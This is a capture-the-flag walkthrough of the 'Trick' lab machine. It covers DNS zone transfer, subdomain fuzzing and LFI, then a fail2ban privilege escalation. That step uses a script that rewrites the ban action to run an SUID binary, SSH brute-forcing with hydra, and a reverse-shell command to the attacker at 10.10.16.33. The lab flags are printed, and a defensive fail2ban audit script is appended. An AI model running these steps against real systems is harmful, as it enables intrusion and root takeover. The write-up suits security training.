[Machines] [Easy] Trick: DNS reverse lookup + Marketing LFI + Pany LFI tool + fail2ban privilege escalation + Tyra…

2025-03-06

Information Gathering

IP Address     Open Ports
10.10.11.166   TCP: 22,25,53,53,80

$ ip='10.10.11.166'; itf='tun0'
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
    echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
    ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" \
        | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
    if [ -n "$ports" ]; then
        echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
        nmap -Pn -sV -sC -p "$ports" "$ip"
    else
        echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
    fi
else
    echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61ff293b36bd9dacfbde1f56884cae2d (RSA)
|   256 9ecdf2406196ea21a6ce2602af759a78 (ECDSA)
|_  256 7293f91158de34ad12b54b4a7364b970 (ED25519)
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Reverse DNS Lookup

$ dig @10.10.11.166 -x 10.10.11.166

# echo '10.10.11.166 trick.htb'>>/etc/hosts

http://trick.htb/

$ dig axfr @10.10.11.166 trick.htb

# echo '10.10.11.166 preprod-payroll.trick.htb'>>/etc/hosts

Marketing LFI && Pany

$ ffuf -w /usr/share/amass/wordlists/subdomains-top1mil-20000.txt -u http://trick.htb -H "Host:preprod-FUZZ.trick.htb" -ac

# echo '10.10.11.166 preprod-marketing.trick.htb'>>/etc/hosts

$ arjun -u 'http://preprod-marketing.trick.htb'

https://github.com/MartinxMax/pany

$ python3 pany.py -u 'http://preprod-marketing.trick.htb?page=*'

User.txt

10c468007a6adfbd703fcfb4f253bb91

Privilege Escalation: fail2ban actionban && Tyrant

$ cd /etc/fail2ban
$ cd action.d

$ cat iptables-multiport.conf

Because the current user belongs to the security group, files in this directory can be moved and new ones added.

https://github.com/MartinxMax/Tyrant

Save the tyrant binary to /tmp.

#!/bin/bash
# run.sh
# The security group can write to the action.d directory but not to the
# root-owned action file itself, so the file is moved aside and a user-owned
# copy is put in its place before it is edited.

echo "Waiting for the file to exist..."
while [[ ! -f /etc/fail2ban/action.d/iptables-multiport.conf ]]; do
    sleep 0.1
done

echo "Backing up the original file..."
mv /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf.bak

cp /etc/fail2ban/action.d/iptables-multiport.conf.bak /etc/fail2ban/action.d/iptables-multiport.conf

echo "[+] Modifying the file..."
# Point both ban actions at the tyrant binary saved in /tmp.
sed -i -e "s|actionban = .*|actionban = /tmp/tyrant|g" \
       -e "s|actionunban = .*|actionunban = /tmp/tyrant|g" \
       /etc/fail2ban/action.d/iptables-multiport.conf

echo "[*] Changing file permissions..."
chmod 666 /etc/fail2ban/action.d/iptables-multiport.conf

echo "[+] Restarting fail2ban service..."
# Restart so fail2ban reloads the edited action file.
sudo -u root /etc/init.d/fail2ban restart

if [[ $? -ne 0 ]]; then
    echo "[-] Fail2ban restart failed. Exiting."
    exit 1
fi

echo "[*] Monitoring /tmp/tyrant for SUID permission..."
# Loop until /tmp/tyrant carries the SUID bit, which the script expects to
# appear once fail2ban runs the ban action as root.
while true; do
    if [[ -u /tmp/tyrant ]]; then
        echo "[+] Successfully detected SUID on /tmp/tyrant. Exiting."
        exit 0
    fi
    sleep 0.5
done

$ ./run.sh

The attack machine continuously sends payloads to port 22 to trigger actionban.

$ hydra -l root -P /home/maptnh/Desktop/rockyou.txt 10.10.11.166 ssh -t 4 -vV

$ /tmp/tyrant -uid 0 -rhost 10.10.16.33 -rport 4443
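
As an added defender-side check (not from this write-up or the Tyrant project), the script below audits a fail2ban action.d directory for the two conditions the escalation above relies on: a group- or world-writable directory or action file, and actionban/actionunban commands that point outside trusted locations. The trusted-prefix allowlist and the constructed sample directory are assumptions made for this demo.

```sh
#!/bin/sh
# Added defender-side check, not part of the write-up or the Tyrant project.
# 1. The directory or an action file is group-/world-writable, so a non-root
#    user (here the "security" group) can swap the file out.
# 2. An actionban/actionunban command points outside trusted locations
#    (e.g. /tmp/tyrant); fail2ban runs these commands as root on each ban.
# The allowlist is a demo assumption, not a fail2ban rule; <tags> are not expanded.
audit_action_dir() {
    dir="$1"
    # -perm -020: group write bit set; -perm -002: world write bit set.
    find "$dir" -maxdepth 1 \( -type d -o -name '*.conf' \) \
         \( -perm -020 -o -perm -002 \) | sed 's/^/WRITABLE: /'
    # /dev/null forces grep to print file names even when only one file matches.
    grep -En '^[[:space:]]*action(ban|unban)[[:space:]]*=' "$dir"/*.conf /dev/null 2>/dev/null |
    while IFS= read -r hit; do
        file=${hit%%:*}; rest=${hit#*:}; lineno=${rest%%:*}
        cmd=$(printf '%s' "${rest#*:}" | sed -E 's/^[[:space:]]*action(un)?ban[[:space:]]*=[[:space:]]*//')
        case "$cmd" in
            '<'*|iptables*|ip6tables*|nft*|ipset*|/sbin/*|/usr/sbin/*|/bin/*|/usr/bin/*) ;;
            *) echo "UNTRUSTED_ACTION: $file:$lineno: $cmd" ;;
        esac
    done
}

# Constructed sample: iptables-multiport.conf rewritten the way run.sh does
# (commands -> /tmp/tyrant, mode 0666) in a group-writable directory, beside
# a sane nftables action file. Prints the sample directory path.
make_sample_dir() {
    d=$(mktemp -d)
    chmod 770 "$d"
    printf '%s\n' '[Definition]' 'actionban = /tmp/tyrant' \
        'actionunban = /tmp/tyrant' > "$d/iptables-multiport.conf"
    chmod 666 "$d/iptables-multiport.conf"
    printf '%s\n' '[Definition]' \
        'actionban = <nft> add element inet f2b-table addr-set-<name> { <ip> }' \
        'actionunban = <nft> delete element inet f2b-table addr-set-<name> { <ip> }' \
        > "$d/nftables.conf"
    chmod 644 "$d/nftables.conf"
    echo "$d"
}
# Number of findings for a directory; 0 means the directory looks clean.
count_findings() {
    audit_action_dir "$1" | wc -l | tr -d ' '
}

# Stand-alone run on the sample; pass /etc/fail2ban/action.d to audit a real host.
sample=$(make_sample_dir)
audit_action_dir "$sample"
rm -rf "$sample"
```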

Root.txt

ce2824dc567a34aa0e509ddb8337782b

